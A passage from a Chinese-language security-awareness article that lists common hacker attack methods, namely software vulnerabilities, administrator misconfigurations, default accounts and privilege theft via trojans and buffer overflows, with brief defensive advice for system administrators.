许多系统都有这样那样的安全漏洞（Bugs），其中某些是操作系统或应用软件本身具有的，如Sendmail漏洞，win98中的共享目录密码验证漏洞和IE5漏洞等，这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏，除非你将网线拔掉；还有一些漏洞是由于系统管理员配置错误引起的，如在网络文件系统中，将目录和文件以可写的方式调出，将未加Shadow的用户密码文件以明码方式存放在某一目录下，这都会给黑客带来可乘之机，应及时加以修正。

8、利用帐号进行攻击

有的黑客会利用操作系统提供的缺省账户和密码进行攻击，例如许多UNIX主机都有FTP和Guest等缺省账户（其密码和账户名同名），有的甚至没有口令。黑客用Unix操作系统提供的命令如Finger和Ruser等收集信息，不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕，将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。

9、偷取特权

利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击，前者可使黑客非法获得对用户机器的完全控制权，后者可使黑客获得超级用户的权限，从而拥有对整个网络的绝对控制权。这种攻击手段，一旦奏效，危害性极大。